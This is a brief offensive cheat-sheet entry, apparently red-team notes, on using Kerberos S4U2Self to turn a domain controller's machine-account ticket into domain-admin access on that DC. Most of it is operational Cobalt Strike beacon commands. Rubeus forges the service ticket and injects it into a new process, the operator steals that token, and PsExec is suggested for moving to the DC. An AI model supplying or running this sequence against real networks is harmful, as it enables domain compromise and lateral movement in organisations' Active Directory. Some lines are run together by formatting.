S4U2Self can be used to leverage a domain controller machine account TGT to laterally move to the DC. This is necessary because machine account are not permitted to remote login into themselves. It’s worth noting that technically the attack should work on any target machine account that can authenticate to CIFS through delegation; it’s just that DCs by default have unconstrained delegation.
Exploit
To use the DC machine account ticket, first perform S4U2Self with a domain admin user (which is permitted to remote login to DC). Note the /self flag.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:[domain-admin] /self /altservice:cifs/[dc-fqdn] /user:[dc-account] /ticket:[dc-account-tgt-base64] /nowrapWe can then use the ticket to create a process under the domain admin’s account and assume its token.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[domain-admin] /password:[does-not-matter] /ticket:[s4u2self-tgs-base64]
beacon> steal_token $pidUse things like PsExec to move to the DC (see Cobalt Strike beacon command list).